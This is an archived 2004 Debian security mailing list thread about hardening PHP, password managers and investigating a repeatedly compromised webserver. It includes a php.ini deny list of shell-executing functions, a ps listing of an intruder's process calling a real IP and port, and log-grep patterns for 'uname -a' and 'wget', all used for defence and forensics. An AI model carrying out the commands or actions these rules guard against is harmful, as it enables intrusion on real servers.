 Yes, unless in your php.ini you have something along the lines of:
 disable_functions = system,passthru,shell_exec,popen,proc_open

Can somebody point me to some documentation about securing PHP?

-- 
Rudy Gevaert[EMAIL PROTECTED]
Web pagehttp://www.webworm.org
Schamper sysadmin   http://www.schamper.ugent.be
GNU/Linux user and Savannah hacker http://savannah.gnu.org
On-line, adj.:
The idea that a human being should always be accessible to a computer.



Re: securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread Jeroen van Wolffelaar
On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote:
 On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote:
  On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:
 
   Does PHP allow executing arbitary binaries?
   
  [snip]
  
  Yes, unless in your php.ini you have something along the lines of:
  disable_functions = system,passthru,shell_exec,popen,proc_open
 
 Can somebody point me to some documentation about securing PHP?

http://php.net/security, a better solution to the above mentioned
problem is 'safe_mode', which is intended to block all dangerous file
access, executing, etc.

--Jeroen

-- 
Jeroen van Wolffelaar
[EMAIL PROTECTED] (also for Jabber  MSN; ICQ: 33944357)
http://Jeroen.A-Eskwadraat.nl



Re: securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread David Ramsden
On Tue, Jun 15, 2004 at 11:20:35AM +0200, Jeroen van Wolffelaar wrote:
 On Tue, Jun 15, 2004 at 10:35:33AM +0200, Rudy Gevaert wrote:
  On Tue, Jun 15, 2004 at 09:23:33AM +0100, David Ramsden wrote:
   On Tue, Jun 15, 2004 at 05:52:18PM +1000, Russell Coker wrote:
  
Does PHP allow executing arbitary binaries?

   [snip]
   
   Yes, unless in your php.ini you have something along the lines of:
   disable_functions = system,passthru,shell_exec,popen,proc_open
  
  Can somebody point me to some documentation about securing PHP?
 
 http://php.net/security, a better solution to the above mentioned
 problem is 'safe_mode', which is intended to block all dangerous file
 access, executing, etc.
 

See also:
 http://www.pookey.co.uk/php-security.xml
 http://www.pookey.co.uk/php-suphp.xml

Regards,
David.
-- 
 .''`. David Ramsden [EMAIL PROTECTED]
: :'  :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
  `-  Debian - when you have better things to do than to fix a system.


pgpxc5T6Gr2YQ.pgp
Description: PGP signature


Re: securing PHP (was: Kernel Crash Bug????)

2004-06-15 Thread Hideki Yamane
Hi,

  Tue, 15 Jun 2004 10:35:33 +0200, Rudy Gevaert
  securing PHP (was: Kernel Crash Bug)
Can somebody point me to some documentation about securing PHP?

 Not documentation but patch for php, Hardened-PHP.
 http://www.hardened-php.net/


-- 
Regards,

 Hideki Yamanemailto:henrich @ iijmio-mail.jp



Re: password managers

2004-06-15 Thread Kenneth Jacker
  al what does everyone else use to keep track of all there passwords?

I've used 'tkpasman' for years ... nice!

http://www.xs4all.nl/~wbsoft/linux/tkpasman.html

-- 
Prof Kenneth H Jacker   [EMAIL PROTECTED]
Computer Science Dept   www.cs.appstate.edu/~khj
Appalachian State Univ
Boone, NC  28608  USA



Re: password managers

2004-06-15 Thread Micah Anderson
Try kedpm, its a debian package, and has console as well as GUI
support and uses the FPM data, really nice.

micah




Re: password managers

2004-06-15 Thread Kenneth Jacker
  micah Try kedpm, it's a Debian package, and has console as well as
  micah GUI support and uses the FPM data, really nice.

Thanks for the suggestion!

Though I found a web site for 'kedpm':

  http://kedpm.sourceforge.net/


the following returns no Debian packages:

  http://packages.debian.org/kedpm

nor did sourceforge (only tar files):

  https://sourceforge.net/project/showfiles.php?group_id=87161


Where are the Debian packages?  ;-)


Also, a question: one thing I like about 'tkpasman' is the feature
which allows two X11 pastes (e.g., username and password) immediately
after selecting a passworded site.  Very convenient ...

How is the info transferred out of 'kedpm'?

  -Kenneth



Re: [OT] Spam fights

2004-06-15 Thread Alain Tesio
Here is a list of junk subject patterns in case someone is interested.

Alain




Re: Spam fights

2004-06-15 Thread Alain Tesio
Can the mailing list software add an X-Subscribed: yes/no to the
mail headers? Then people decide to filter it out or not.

Alain



RE: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Ross Tsolakidis
Wipe, install, set up chkrootkit and run it often. 
I've already done that.  There was no rootkit.

How does phpnuke compromise apache if apache is set up correctly?
I believe it's some of the modules available and running php with 'safe
mode off'.

I need to find the vulnerable code on this box.  And I have no idea
where to begin.
I've tried running virus scans, nothing is infected.


--
Ross



-Original Message-
From: s. keeling [mailto:[EMAIL PROTECTED] 
Sent: Tuesday, 15 June 2004 2:06 PM
To: debian-security@lists.debian.org
Subject: Re: Advice needed, trying to find the vulnerable code on Debian
webserver.

Incoming from Ross Tsolakidis:
 
 One of our webservers seems to get compromised on a daily basis.
 When I do a ps ax I see these processes all the time.
 
 18687 ?S  0:00 shell
 18701 ?Z  0:00 [sh defunct]
 18704 ?T  0:00 ./3 200.177.162.185 1524

I vaguely remember that 3 in /tmp is slapper.  Wipe, install, set up
chkrootkit and run it often.

How does phpnuke compromise apache if apache is set up correctly?


--
Any technology distinguishable from magic is insufficiently advanced.
(*)   http://www.spots.ab.ca/~keeling 
- -





Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread David Ramsden
On Tue, Jun 15, 2004 at 02:32:21PM +1000, Ross Tsolakidis wrote:
 Wipe, install, set up chkrootkit and run it often. 
 I've already done that.  There was no rootkit.
 

An alternative to chkrootkit is rkhunter - it's a set of scripts. You
can find the web address on something like freshmeat.net or Google
easily.

[snip]

 I need to find the vulnerable code on this box.  And I have no idea
 where to begin.
 I've tried running virus scans, nothing is infected.
 
 
[snip]

The files you found within /tmp - grep Apache's access /and/ error logs
for these file names. Other common things to grep for include the use of
uname -a, ls -l, wget, remembering you may need to substitute a
space for %20:
 # grep -i 'uname%20-a' {access,error}.log
 # grep -i 'wget' {access,error}.log

How about running a packet sniffer on port 80 too and monitor the
traffic. Log to a text file and grep that?

HTH.
David.
-- 
 .''`. David Ramsden [EMAIL PROTECTED]
: :'  :http://david.hexstream.eu.org/
`. `'` PGP key ID: 507B379B on wwwkeys.pgp.net
  `-  Debian - when you have better things to do than to fix a system.
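The grep advice above, carried a step further as an added example that is not part of the original post: each request is URL-decoded before matching, so %20, + and double-encoded forms all normalise to a space, and the scanner flags both the dropped file names from /tmp and the recon/download commands mentioned. The log lines and the placeholder.invalid host are constructed.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample lines in Apache combined log format (not real traffic).
SAMPLE_LOG = """\
10.0.0.5 - - [15/Jun/2004:11:02:17 +1000] "GET /index.php?page=news HTTP/1.1" 200 5123 "-" "Mozilla/4.0"
10.0.0.9 - - [15/Jun/2004:11:04:41 +1000] "GET /modules.php?name=News&file=article&sid=1;uname%20-a HTTP/1.1" 200 812 "-" "Mozilla/4.0"
10.0.0.9 - - [15/Jun/2004:11:05:02 +1000] "GET /modules.php?name=News&file=article&sid=1;cd%20/tmp;wget%20http://placeholder.invalid/3 HTTP/1.1" 200 220 "-" "-"
10.0.0.9 - - [15/Jun/2004:11:05:30 +1000] "GET /modules.php?name=News&file=article&sid=1;./3 HTTP/1.1" 200 0 "-" "-"
"""

# Names seen in /tmp and in ps output on the thread, plus the commands the post says to grep for.
DROPPED_FILES = ["3", "shell"]
COMMAND_PATTERNS = [r"\buname\s+-a\b", r"\bwget\b", r"\bls\s+-l\b", r"\bcd\s+/tmp\b"]

# Only the fields needed here: client IP, timestamp, method and request target.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+)[^"]*"')

def decode_target(target):
    """Decode twice so %20, + and double-encoded %2520 all become a plain space."""
    return unquote_plus(unquote_plus(target))

def suspicious_requests(log_text):
    """Return one dict per log line whose decoded request carries an indicator."""
    # A dropped file name must be a token on its own (after ; & | or whitespace),
    # optionally prefixed by ./ or /tmp/, so a short name like "3" does not match
    # every "3" inside an ordinary path or query value.
    names = "|".join(map(re.escape, DROPPED_FILES))
    file_re = re.compile(r"(?:^|[;&|\s])(?:\./|/tmp/)?(" + names + r")(?=$|[\s;&|])")
    cmd_re = re.compile("|".join(COMMAND_PATTERNS), re.IGNORECASE)
    hits = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue  # malformed or non-request line; skip rather than crash
        decoded = decode_target(m.group("target"))
        reasons = [f"command: {c.group(0)}" for c in cmd_re.finditer(decoded)]
        reasons += [f"file: {f.group(1)}" for f in file_re.finditer(decoded)]
        if reasons:
            hits.append({"ip": m.group("ip"), "time": m.group("ts"),
                         "request": decoded, "reasons": reasons})
    return hits

if __name__ == "__main__":
    for hit in suspicious_requests(SAMPLE_LOG):
        print(hit["time"], hit["ip"], hit["reasons"], hit["request"])
```

Run it over the real access and error logs by replacing SAMPLE_LOG with the file contents; hits still need a human look, since a legitimate download page can mention wget too.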




Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread TiM


Look at installing mod_security, http://modsecurity.org

Install some rules for it to harden your webserver, see if anything is 
flagged in the security log.



Re: Advice needed, trying to find the vulnerable code on Debian webserver.

2004-06-15 Thread Alvin Oga

hi ya

On Wed, 16 Jun 2004, TiM wrote:

 
 Look at installing mod_security, http://modsecurity.org
 
 Install some rules for it to harden your webserver, see if anything is 
 flagged in the security log.

other web server testing tools
http://www.linux-sec.net/Web/#Testing

c ya
alvin